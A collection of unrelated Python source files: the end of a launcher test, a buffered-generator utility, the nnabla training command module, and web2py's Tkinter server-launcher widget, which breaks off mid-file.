param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
|
buffering.py
|
import multiprocessing as mp
import Queue
import threading
def buffered_gen_mp(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate process.
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = mp.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_process(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
buffer.close() # unfortunately this does not suffice as a signal: if buffer.get()
# was called and subsequently the buffer is closed, it will block forever.
process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer))
process.start()
for data in iter(buffer.get, None):
yield data
def buffered_gen_threaded(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = Queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
|
train.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import range
from collections import OrderedDict
from contextlib2 import ExitStack # Backport from python3
import glob
import numpy as np
import os
import time
import zipfile
import nnabla as nn
from nnabla.logger import logger
from nnabla import available_contexts
from nnabla.parameter import save_parameters
from nnabla.utils.progress import configure_progress, progress
import nnabla.utils.callback as callback
from nnabla.utils.cli.utility import let_data_to_variable
from nnabla.utils.nnp_format import nnp_version
from nnabla.utils.communicator_util import current_communicator, single_or_rankzero
import nnabla.utils.load as load
_save_parameter_info = {}
def _all_reduce(comm, var, division, inplace):
import threading
_finish = False
def _wait():
import time
count = 0
while not _finish:
if count > 10000:
logger.log(99, "STALLED MPI RANK {}".format(comm.rank))
os.kill(os.getpid(), 9)
time.sleep(0.01)
count += 1
th = threading.Thread(target=_wait)
th.start()
comm.all_reduce(var, division=division, inplace=inplace)
_finish = True
th.join()
def _save_parameters(args, suffix, epoch, force=False):
global _save_parameter_info
if suffix not in _save_parameter_info:
_save_parameter_info[suffix] = {}
_save_parameter_info[suffix]['epoch'] = 0
_save_parameter_info[suffix]['time'] = 0
current_time = time.time()
timediff = current_time - _save_parameter_info[suffix]['time']
epochdiff = epoch - _save_parameter_info[suffix]['epoch']
globname = os.path.join(args.outdir, 'results_{}_*.nnp'.format(suffix))
exists = glob.glob(globname)
base = os.path.join(args.outdir, 'results_{}_{}'.format(suffix, epoch))
base_candidate = callback.result_base(base, suffix, args.outdir)
if base_candidate is None:
if suffix is None or suffix == 'best':
base = os.path.join(args.outdir, 'results')
else:
base = base_candidate
filename = base + '.nnp'
if force or (not os.path.exists(filename) and (timediff > 180.0 or epochdiff > 10)):
# Remove existing nnp before saving new file.
for exist in exists:
os.unlink(exist)
version_filename = base + '_version.txt'
with open(version_filename, 'w') as file:
file.write('{}\n'.format(nnp_version()))
param_filename = base + '_param.protobuf'
save_parameters(param_filename)
with zipfile.ZipFile(filename, 'w') as nnp:
nnp.write(version_filename, 'nnp_version.txt')
nnp.write(_save_parameter_info['config'], os.path.basename(
_save_parameter_info['config']))
nnp.write(param_filename, 'parameter.protobuf')
os.unlink(version_filename)
os.unlink(param_filename)
_save_parameter_info[suffix]['epoch'] = epoch
_save_parameter_info[suffix]['time'] = current_time
callback.save_train_snapshot()
def _update(iter, config, cost):
comm = current_communicator()
loaded_data = {}
is_first_optimizer = True
def _sum_cost():
if comm:
# logger.log(99, "Calc cost with communicator")
var = [nn.NdArray()]
var[0].data = cost.sum_iteration
_all_reduce(comm, var, division=False, inplace=True)
cost.sum_epoch += var[0].data
cost.num_iteration += comm.size
else:
cost.sum_epoch += cost.sum_iteration
cost.num_iteration += 1
def _get_reserved_variable(shape, reserved_variable_name, iter, iter_per_epoch, max_epoch):
if reserved_variable_name == "%iter":
value = iter
elif reserved_variable_name == "%max_iter":
value = max_epoch * iter_per_epoch
elif reserved_variable_name == "%epoch":
value = iter // iter_per_epoch
elif reserved_variable_name == "%epochf":
value = iter * 1.0 / iter_per_epoch
elif reserved_variable_name == "%max_epoch":
value = max_epoch
elif reserved_variable_name == "%progress":
value = (iter * 1.0 / iter_per_epoch) / max_epoch
else:
raise ValueError("Unknown reserved variable {}".format(
reserved_variable_name))
return value
for opt in config.optimizers.values():
o = opt.optimizer
if (o.start_iter == 0 or iter + 1 >= o.start_iter) and (o.end_iter == 0 or iter + 1 <= o.end_iter):
# Load dataset
data = OrderedDict()
for di in opt.data_iterators:
if di not in loaded_data:
loaded_data[di] = di.next()
data.update(zip(di.variables, loaded_data[di]))
for v, d in o.dataset_assign.items():
dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
0].inputs else None
if d not in data and d[0] == "%":
value = _get_reserved_variable(
v.variable_instance.shape, d, iter, config.training_config.iter_per_epoch, config.training_config.max_epoch)
v.variable_instance.data.fill(value)
elif d in data:
let_data_to_variable(v.variable_instance, data[
d], ctx=dest_context,
data_name=d, variable_name=v.name)
else:
raise ValueError('Variable "{}" is not found in dataset "{}", optimizer "{}"'.format(
d, ', '.join(o.data_iterators.keys()), o.name))
# Generate data
for v, generator in o.generator_assign.items():
dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance,
data=generator(v.shape), ctx=dest_context,
variable_name=v.name)
# Monitor loss before forward to prepare input data while processing on
# GPU
if cost.variables:
for l in cost.variables:
cost.sum_iteration += np.mean(l.variable_instance.d)
# l.variable_instance.data.zero()
if is_first_optimizer:
is_first_optimizer = False
_sum_cost()
if single_or_rankzero():
progress("Training : cost={0:0.6f}".format(cost.sum_iteration),
(iter % config.training_config.iter_per_epoch) * 1.0 / config.training_config.iter_per_epoch)
cost.sum_iteration = 0.0
# Forward
o.network.forward(o.forward_sequence)
# Backward
o.network.backward(o.backward_sequence, iter %
o.update_interval == 0)
# Update
if iter % o.update_interval == o.update_interval - 1:
if o.weight_decay > 0:
o.solver.weight_decay(o.weight_decay)
if o.comm: # Updated param with communicator
params = [x.grad for x in o.parameters.values()]
_all_reduce(o.comm, params, division=True, inplace=True)
if o.scheduler is not None:
o.solver.set_learning_rate(
o.scheduler.get_learning_rate(iter))
o.solver.update()
# Sync w sometimes
if iter % 10 == 9: # TODO: change the interval
if o.comm:
params = [x.data for x in o.parameters.values()]
_all_reduce(o.comm, params, division=True, inplace=True)
# Reserve monitor loss
cost.variables = o.loss_variables
# Monitor loss at the end of epoch
if iter % config.training_config.iter_per_epoch == config.training_config.iter_per_epoch - 1 and cost.variables:
for l in cost.variables:
cost.sum_iteration += np.mean(l.variable_instance.d)
# l.variable_instance.data.zero()
_sum_cost()
cost.variables = None
cost.sum_iteration = 0.0
return cost
def _evaluate(args, config, monitoring_report, best_error, epoch):
comm = current_communicator()
error_str = ''
valid_error = 0.0
def _sum_error(sum, error):
ret = None
if comm:
# logger.log(99, "Calc error with communicator")
var = [nn.NdArray()]
var[0].data = error
_all_reduce(comm, var, division=False, inplace=True)
ret = sum + var[0].data
else:
ret = sum + error
return ret
for name, mon in config.monitors.items():
m = mon.monitor
error_sum_monitor = 0.0
error_count = 0
data_size = max([di.size for di in mon.data_iterators])
batch_size = max([di.batch_size for di in mon.data_iterators])
for i in range(data_size // batch_size):
# Load dataset
data = OrderedDict()
for di in mon.data_iterators:
data.update(zip(di.variables, di.next()))
# Set data to variable
for v, d in m.dataset_assign.items():
dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance, data[
d], ctx=dest_context,
data_name=d, variable_name=v.name)
# Generate data
for v, generator in m.generator_assign.items():
dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance,
data=generator(v.shape), ctx=dest_context,
variable_name=v.name)
# Sum error before forward to prepare input data while processing
# on GPU
if error_count > 0:
error_sum = 0.0
for v in m.monitor_variables:
error_sum += np.mean(v.variable_instance.d)
# v.variable_instance.data.zero()
error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
if single_or_rankzero():
progress('Evaluating "{0}"'.format(
name) + ' : error={0:0.6f}'.format(
error_sum_monitor / error_count),
di.position * 1.0 / di.size)
error_count += comm.size if comm else 1
# Forward recursive
m.network.forward(m.forward_sequence)
# Sum error at the end of dataset
error_sum = 0.0
for v in m.monitor_variables:
error_sum += np.mean(v.variable_instance.d)
# v.variable_instance.data.zero()
error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
if error_count == 0:
error = 0
else:
error = error_sum_monitor / error_count
if np.isnan(error) or np.isinf(error):
logger.log(99, 'Validation error is Nan')
error = 0.0
monitoring_report.append(' {}: {}\n'.format(name, error))
callback.update_status((['monitoring_report', epoch, name], error))
callback.update_status((['last', name], error)) # save last value
if error_str != '':
error_str += ', '
else:
error_str = ' {'
error_str += '{}={:.6f}'.format(name, error)
if name == 'valid_error':
valid_error = error
if error_str != '':
error_str += '}'
# Save Parameters
if single_or_rankzero():
if (not config.training_config.save_best) or \
(not best_error) or \
(best_error is not None and valid_error <= best_error):
best_error = valid_error
callback.update_status(('best.valid_error', best_error))
callback.update_status(('best.epoch', epoch))
_save_parameters(args, 'best', epoch, True)
return best_error, error_str
def _get_current_parameter(args):
best_error, best_epoch = callback.get_best_from_status(args)
globname = os.path.join(args.outdir, 'results_current_*.nnp')
exists = glob.glob(globname)
if len(exists) > 0:
ex_list = {}
for ex in exists:
n = int(ex.rsplit('_', 1)[1].rsplit('.', 1)[0])
ex_list[n] = ex
last_epoch = sorted(ex_list.keys(), reverse=True)[0]
last_parameter = ex_list[last_epoch]
logger.log(99, "Load parameter from [{}]".format(
os.path.basename(last_parameter)))
load.load([last_parameter], parameter_only=True)
return last_epoch, best_epoch, best_error
return 0, best_epoch, best_error
def _calc_estimate_time(timeinfo, max_iter, last_iter, iter):
timeinfo.past_time = time.time() - timeinfo.start_time
timeinfo.estimate_time = timeinfo.past_time * \
(max_iter - last_iter) / (iter - last_iter)
timeinfo.remain_time = timeinfo.estimate_time - timeinfo.past_time
timeinfo.last_past_time = timeinfo.past_time
return timeinfo
def _train(args, config):
global _save_parameter_info
comm = current_communicator()
best_epoch = None
best_error = None
last_epoch = 0
if args.resume:
last_epoch, best_epoch, best_error = _get_current_parameter(args)
if best_epoch is not None:
logger.log(
99, "Best error {} recorded at epoch {} in previous training.".format(best_error,
best_epoch))
if best_epoch > last_epoch:
logger.log(
99, "Resumed epoch is {} but this training keep this result.".format(last_epoch))
logger.log(99, "Resume from epoch {}".format(last_epoch + 1))
callback.update_status(('epoch.max', config.training_config.max_epoch))
callback.update_status(('epoch.current', last_epoch + 1
if last_epoch < config.training_config.max_epoch
else config.training_config.max_epoch))
max_iteration = config.training_config.max_epoch * \
config.training_config.iter_per_epoch
if single_or_rankzero():
logger.log(99, 'Training epoch {} of {} begin'.format(last_epoch + 1,
config.training_config.max_epoch))
class Cost:
pass
cost = Cost()
cost.sum_epoch = 0.0
cost.num_iteration = 0
cost.sum_iteration = 0.0
cost.variables = None
class TimeInfo:
pass
timeinfo = TimeInfo()
timeinfo.past_time = 0
timeinfo.estimate_time = 0
timeinfo.last_past_time = None
if max_iteration > 0:
last_iteration = last_epoch * config.training_config.iter_per_epoch
if last_iteration < max_iteration:
timeinfo.start_time = time.time()
callback.update_status('processing', True, timeinfo.start_time)
for iteration in range(last_iteration, max_iteration):
cost = _update(iteration, config, cost)
if np.isnan(cost.sum_epoch) or np.isinf(cost.sum_epoch):
logger.log(99, 'Cost is Nan')
return False, False
timeinfo = _calc_estimate_time(
timeinfo, max_iteration, last_iteration, iteration + 1)
callback.update_time_train(prediction=timeinfo.estimate_time)
if config.timelimit > 0 and timeinfo.estimate_time > config.timelimit:
logger.log(99, 'Expected training time ({:.3f}s) will exceed time limit ({}s).'.format(
timeinfo.estimate_time, config.timelimit))
return False, False
if (iteration + 1) % config.training_config.iter_per_epoch == 0:
last_past_time = -1
# End of epoch
epoch = iteration // config.training_config.iter_per_epoch + 1
cost_avg_epoch = cost.sum_epoch / cost.num_iteration if cost.num_iteration else 0
cost.sum_epoch = 0.0
cost.num_iteration = 0
monitoring_report = []
# Evaluation
error_str = ''
if epoch % config.training_config.monitor_interval == 0 or epoch <= 5:
best_error, error_str = _evaluate(
args, config, monitoring_report, best_error, epoch)
if single_or_rankzero():
# Write to monitoring_report.yml
f = open(os.path.join(
args.outdir, 'monitoring_report.yml'), 'a')
f.write('{}:\n'.format(epoch - 1))
f.write(' cost: {}\n'.format(cost_avg_epoch))
for s in monitoring_report:
f.write(s)
f.close()
callback.update_status((['monitoring_report', epoch, 'cost'],
cost_avg_epoch))
_save_parameters(args, 'current', epoch)
callback.update_status(('epoch.current', epoch))
callback.update_status()
logger.log(99, 'epoch {} of {} cost={:.6f} {} time=({:.1f}s /{:.1f}s)'.format(
epoch, config.training_config.max_epoch, cost_avg_epoch, error_str,
timeinfo.past_time, timeinfo.estimate_time))
if callback.check_training_time(args, config, timeinfo, epoch, last_epoch) == False:
_save_parameters(args, 'current', epoch, True)
return False, True
if single_or_rankzero():
_save_parameters(args, 'current', epoch, True)
return True, False
def train_command(args):
callback.update_status(args)
if single_or_rankzero():
configure_progress(os.path.join(args.outdir, 'progress.txt'))
info = load.load([args.config], prepare_data_iterator=None,
exclude_parameter=True)
# Check dataset uri is empty.
dataset_error = False
for dataset in info.datasets.values():
if dataset.uri.strip() == '':
dataset_error = True
if dataset_error:
logger.log(99, 'Fatal error. Dataset URI is empty.')
return False
class TrainConfig:
pass
config = TrainConfig()
config.timelimit = -1
if args.param:
load.load([args.param], parameter_only=True)
config.timelimit = callback.get_timelimit(args)
config.global_config = info.global_config
config.training_config = info.training_config
if single_or_rankzero():
logger.log(99, 'Train with contexts {}'.format(available_contexts))
class OptConfig:
pass
config.optimizers = OrderedDict()
for name, opt in info.optimizers.items():
o = OptConfig()
o.optimizer = opt
o.data_iterators = []
config.optimizers[name] = o
class MonConfig:
pass
config.monitors = OrderedDict()
for name, mon in info.monitors.items():
m = MonConfig()
m.monitor = mon
m.data_iterators = []
config.monitors[name] = m
# Training
comm = current_communicator()
config.training_config.iter_per_epoch //= comm.size if comm else 1
max_iteration = config.training_config.max_epoch * \
config.training_config.iter_per_epoch
global _save_parameter_info
_save_parameter_info = {}
_, config_ext = os.path.splitext(args.config)
if config_ext == '.prototxt' or config_ext == '.nntxt':
_save_parameter_info['config'] = args.config
elif config_ext == '.nnp':
with zipfile.ZipFile(args.config, 'r') as nnp:
for name in nnp.namelist():
_, ext = os.path.splitext(name)
if ext == '.nntxt' or ext == '.prototxt':
nnp.extract(name, args.outdir)
_save_parameter_info['config'] = os.path.join(
args.outdir, name)
result = False
restart = False
if max_iteration > 0:
data_iterators = {'optimizer': {}, 'monitor': {}}
rng = np.random.RandomState(comm.rank if comm else 0)
with ExitStack() as stack:
# Create data_iterator instance only once for each dataset in optimizers
optimizer_data_iterators = {}
for name, o in config.optimizers.items():
for di in o.optimizer.data_iterators.values():
if di not in optimizer_data_iterators:
di_instance = stack.enter_context(di())
if comm and comm.size > 1:
di_instance = di_instance.slice(
rng, comm.size, comm.rank)
optimizer_data_iterators[di] = di_instance
else:
di_instance = optimizer_data_iterators[di]
o.data_iterators.append(di_instance)
# Create data_iterator instance only once for each dataset in monitors
monitor_data_iterators = {}
for name, m in config.monitors.items():
for di in m.monitor.data_iterators.values():
if di not in monitor_data_iterators:
di_instance = stack.enter_context(di())
if comm and comm.size > 1:
di_instance = di_instance.slice(
rng, comm.size, comm.rank)
monitor_data_iterators[di] = di_instance
else:
di_instance = monitor_data_iterators[di]
m.data_iterators.append(stack.enter_context(di()))
monitor_data_iterators.update(optimizer_data_iterators)
result, restart = _train(args, config)
else:
# save parameters without training (0 epoch learning)
logger.log(99, '0 epoch learning. (Just save parameter.)')
if single_or_rankzero():
_save_parameters(args, None, 0, True)
result = True
if single_or_rankzero() and not restart:
if result:
logger.log(99, 'Training Completed.')
callback.update_status('finished')
else:
logger.log(99, 'Training Incompleted.')
callback.update_status('failed')
if single_or_rankzero():
progress(None)
return True
def add_train_command(subparsers):
# Train
subparser = subparsers.add_parser('train', help='Training with NNP.')
subparser.add_argument(
'-r', '--resume', help='resume from last saved parameter.', action='store_true')
subparser.add_argument(
'-c', '--config', help='path to nntxt', required=True)
subparser.add_argument(
'-p', '--param', help='path to parameter file', required=False)
subparser.add_argument(
'-o', '--outdir', help='output directory', required=True)
callback.add_train_command_arg(subparser)
subparser.set_defaults(func=train_command)
|
widget.py
|
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
GUI widget and services start function
--------------------------------------
"""
from __future__ import print_function
import sys
from gluon._compat import thread, xrange, PY2
import time
import threading
import os
import socket
import signal
import math
import logging
import getpass
from gluon import main, newcron
from gluon.fileutils import read_file, create_welcome_w2p
from gluon.console import console
from gluon.settings import global_settings
from gluon.shell import die, run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
time.localtime().tm_year)
ProgramVersion = read_file('VERSION').rstrip()
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 5):
from platform import python_version
sys.stderr.write("Warning: web2py requires at least Python 2.7/3.5"
" but you are running %s\n" % python_version())
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
# see "python -m unittest -h" for unittest options help
# NOTE: someone might be interested either in using the
# -f (--failfast) option to stop testing on first failure, or
# in customizing the test selection, for example to run only
# 'gluon.tests.<module>', 'gluon.tests.<module>.<class>' (this
# could be shortened as 'gluon.tests.<class>'), or even
# 'gluon.tests.<module>.<class>.<method>' (or
# the shorter 'gluon.tests.<class>.<method>')
call_args = ['-m', 'unittest', '-c', 'gluon.tests']
if options.verbose:
call_args.insert(-1, '-v')
if options.with_coverage:
try:
import coverage
except:
die('Coverage not installed')
if not PY2:
sys.stderr.write('Experimental ')
sys.stderr.write("Python %s\n" % sys.version)
if options.with_coverage:
coverage_exec = 'coverage2' if PY2 else 'coverage3'
coverage_config_file = os.path.join('gluon', 'tests', 'coverage.ini')
coverage_config = os.environ.setdefault("COVERAGE_PROCESS_START",
coverage_config_file)
run_args = [coverage_exec, 'run', '--rcfile=%s' % coverage_config]
# replace the current process
os.execvpe(run_args[0], run_args + call_args, os.environ)
else:
run_args = [sys.executable]
# replace the current process
os.execv(run_args[0], run_args + call_args)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
elif host == '0.0.0.0':
host = '127.0.0.1'
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print('please visit:')
print('\t' + url)
print('starting browser...')
try:
import webbrowser
webbrowser.open(url)
except:
print('warning: unable to detect your browser')
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
if PY2:
import Tkinter as tkinter
import tkMessageBox as messagebox
else:
import tkinter
from tkinter import messagebox
bg_color = 'white'
root.withdraw()
self.root = tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0, 0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = tkinter.Menu(self.root)
servermenu = tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, self.options.log_filename)
iconphoto = os.path.join('extras', 'icons', 'web2py.gif')
if os.path.exists(iconphoto):
img = tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
ProgramInfo = """%s
%s
%s""" % (ProgramName, ProgramAuthor, ProgramVersion)
item = lambda: messagebox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = tkinter.NW
# Prepare the logo area
self.logoarea = tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras', 'icons', 'splashlogo.gif')
if os.path.exists(logo):
img = tkinter.PhotoImage(file=logo)
pnl = tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
tkinter.Label(self.bannerarea, anchor=tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack(side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
# retrieves the list of server IP addresses
try:
if_ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
if_ips = []
tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in if_ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=tkinter.W, text='%s (%s)' % (legend, ip),
justify=tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = tkinter.Entry(self.root)
self.port_number.insert(tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
if start and self.options.with_scheduler and self.options.schedulers:
# the widget takes care of starting the schedulers
apps = [ag.split(':', 1)[0] for ag in self.options.schedulers]
else:
apps = []
for app in apps:
self.try_start_scheduler(app)
# reset the menu
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.isdir(os.path.join(applications_folder, arq))
]
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for Python 2.6+\n')
return
code = "from gluon.globals import current;current._scheduler.loop()"
print('starting scheduler from widget for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
logging.getLogger().setLevel(self.options.log_level)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print("Currently running %s scheduler processes" % (
len(self.scheduler_processes)))
p.start()
print("Processes started")
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Updates app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connects pages """
# reset the menu
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, '__init__.py'))
]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
if PY2:
import tkMessageBox as messagebox
else:
from tkinter import messagebox
messagebox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
if self.options.server_key and self.options.server_cert:
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception as e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
